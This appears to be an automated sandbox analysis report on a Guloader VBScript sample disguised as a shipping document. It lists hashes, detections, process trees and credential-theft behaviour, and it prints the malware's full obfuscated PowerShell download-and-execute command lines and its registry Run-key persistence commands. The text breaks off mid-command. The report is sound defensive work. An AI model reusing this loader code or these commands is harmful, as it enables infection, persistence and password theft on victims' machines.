Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2024 08:49
Static task
static1
Behavioral task
behavioral1
Sample
awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Resource
win10v2004-20240611-en
General
-
Target
awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
-
Size
187KB
-
MD5
298320f7d69c921e9c7b012b9d5d1b18
-
SHA1
fdd4a9fb56b627744d813803fb98bbf741c32b36
-
SHA256
5ff48cae59e91a2c7cdeb79cecf1c55395eb97c78792dd0447ba43595510f219
-
SHA512
cb7648d505a222fcac46a4c20ed503bf6f168f7b321676f0fa6a99d7c8bf97a122965a460ea8d62efeed918e3a816c968a8e6e787abf8a66fb789b521a538457
-
SSDEEP
3072:3mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZi:308GxbKja3+DCbKCvBB/WnHXC/sLJFJb
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral2/memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/412-64-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral2/memory/3676-142-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1616-71-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/412-64-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2624-149-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3676-142-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exepowershell.exepowershell.exeflow pid process 4 4080 WScript.exe 21 4508 powershell.exe 60 3260 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
Processes:
wab.exewab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe Key opened \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Soget = "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\\Submicron\\').Velkommenteret;%Equiexcellency% ($Neosorex38)" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rollingerne = "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\\overdeferential\\').retoucheres;%Montuvio% ($Lkapsler)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
Processes:
wab.exewab.exepid process 2072 wab.exe 2072 wab.exe 4908 wab.exe 4908 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exewab.exepowershell.exewab.exepid process 2044 powershell.exe 2072 wab.exe 4052 powershell.exe 4908 wab.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exewab.exepowershell.exedescription pid process target process PID 2044 set thread context of 2072 2044 powershell.exe wab.exe PID 2072 set thread context of 412 2072 wab.exe wab.exe PID 2072 set thread context of 1492 2072 wab.exe wab.exe PID 2072 set thread context of 1616 2072 wab.exe wab.exe PID 4052 set thread context of 4908 4052 powershell.exe wab.exe PID 2072 set thread context of 3676 2072 wab.exe wab.exe PID 2072 set thread context of 4912 2072 wab.exe wab.exe PID 2072 set thread context of 2624 2072 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
wab.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings wab.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 39 IoCs
Processes:
powershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exewab.exewab.exewab.exepowershell.exepid process 4508 powershell.exe 4508 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 412 wab.exe 412 wab.exe 1616 wab.exe 1616 wab.exe 412 wab.exe 412 wab.exe 3260 powershell.exe 3260 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 4908 wab.exe 3676 wab.exe 3676 wab.exe 3676 wab.exe 2624 wab.exe 3676 wab.exe 2624 wab.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
Processes:
powershell.exewab.exepowershell.exepid process 2044 powershell.exe 2072 wab.exe 2072 wab.exe 2072 wab.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 2072 wab.exe 2072 wab.exe 2072 wab.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exewab.exepowershell.exepowershell.exewab.exepowershell.exedescription pid process Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 1616 wab.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeDebugPrivilege 2624 wab.exe Token: SeDebugPrivilege 4572 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 2072 wab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 4080 wrote to memory of 4508 4080 WScript.exe powershell.exe PID 4080 wrote to memory of 4508 4080 WScript.exe powershell.exe PID 4508 wrote to memory of 4040 4508 powershell.exe cmd.exe PID 4508 wrote to memory of 4040 4508 powershell.exe cmd.exe PID 4508 wrote to memory of 2044 4508 powershell.exe powershell.exe PID 4508 wrote to memory of 2044 4508 powershell.exe powershell.exe PID 4508 wrote to memory of 2044 4508 powershell.exe powershell.exe PID 2044 wrote to memory of 4912 2044 powershell.exe cmd.exe PID 2044 wrote to memory of 4912 2044 powershell.exe cmd.exe PID 2044 wrote to memory of 4912 2044 powershell.exe cmd.exe PID 2044 wrote to memory of 2072 2044 powershell.exe wab.exe PID 2044 wrote to memory of 2072 2044 powershell.exe wab.exe PID 2044 wrote to memory of 2072 2044 powershell.exe wab.exe PID 2044 wrote to memory of 2072 2044 powershell.exe wab.exe PID 2044 wrote to memory of 2072 2044 powershell.exe wab.exe PID 2072 wrote to memory of 4404 2072 wab.exe cmd.exe PID 2072 wrote to memory of 4404 2072 wab.exe cmd.exe PID 2072 wrote to memory of 4404 2072 wab.exe cmd.exe PID 4404 wrote to memory of 2652 4404 cmd.exe reg.exe PID 4404 wrote to memory of 2652 4404 cmd.exe reg.exe PID 4404 wrote to memory of 2652 4404 cmd.exe reg.exe PID 2072 wrote to memory of 412 2072 wab.exe wab.exe PID 2072 wrote to memory of 412 2072 wab.exe wab.exe PID 2072 wrote to memory of 412 2072 wab.exe wab.exe PID 2072 wrote to memory of 412 2072 wab.exe wab.exe PID 2072 wrote to memory of 1492 2072 wab.exe wab.exe PID 2072 wrote to memory of 1492 2072 wab.exe wab.exe PID 2072 wrote to memory of 1492 2072 wab.exe wab.exe PID 2072 wrote to memory of 1492 2072 wab.exe wab.exe PID 2072 wrote to memory of 1616 2072 wab.exe wab.exe PID 2072 wrote to memory of 1616 2072 wab.exe wab.exe PID 2072 wrote to memory of 1616 2072 wab.exe wab.exe PID 2072 wrote to memory of 1616 2072 wab.exe wab.exe PID 2072 wrote to memory of 3840 2072 wab.exe WScript.exe PID 2072 wrote to memory of 3840 2072 wab.exe WScript.exe PID 2072 wrote to memory of 3840 2072 wab.exe WScript.exe PID 3840 wrote to memory of 3260 3840 WScript.exe powershell.exe PID 3840 wrote to memory of 3260 3840 WScript.exe powershell.exe PID 3840 wrote to memory of 3260 3840 WScript.exe powershell.exe PID 3260 wrote to memory of 3256 3260 powershell.exe cmd.exe PID 3260 wrote to memory of 3256 3260 powershell.exe cmd.exe PID 3260 wrote to memory of 3256 3260 powershell.exe cmd.exe PID 3260 wrote to memory of 4052 3260 powershell.exe powershell.exe PID 3260 wrote to memory of 4052 3260 powershell.exe powershell.exe PID 3260 wrote to memory of 4052 3260 powershell.exe powershell.exe PID 4052 wrote to memory of 4620 4052 powershell.exe cmd.exe PID 4052 wrote to memory of 4620 4052 powershell.exe cmd.exe PID 4052 wrote to memory of 4620 4052 powershell.exe cmd.exe PID 4052 wrote to memory of 4516 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4516 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4516 4052 powershell.exe wab.exe PID 4052 wrote to memory of 448 4052 powershell.exe wab.exe PID 4052 wrote to memory of 448 4052 powershell.exe wab.exe PID 4052 wrote to memory of 448 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4908 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4908 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4908 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4908 4052 powershell.exe wab.exe PID 4052 wrote to memory of 4908 4052 powershell.exe wab.exe PID 4908 wrote to memory of 1152 4908 wab.exe cmd.exe PID 4908 wrote to memory of 1152 4908 wab.exe cmd.exe PID 4908 wrote to memory of 1152 4908 wab.exe cmd.exe PID 1152 wrote to memory of 3836 1152 cmd.exe reg.exe PID 1152 wrote to memory of 3836 1152 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"6⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vakujkwtnfybgdxojtdupplzytruqkwicf"5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yuqfbc"5⤵
- Accesses Microsoft Outlook accounts
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\iwdycvsop"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') 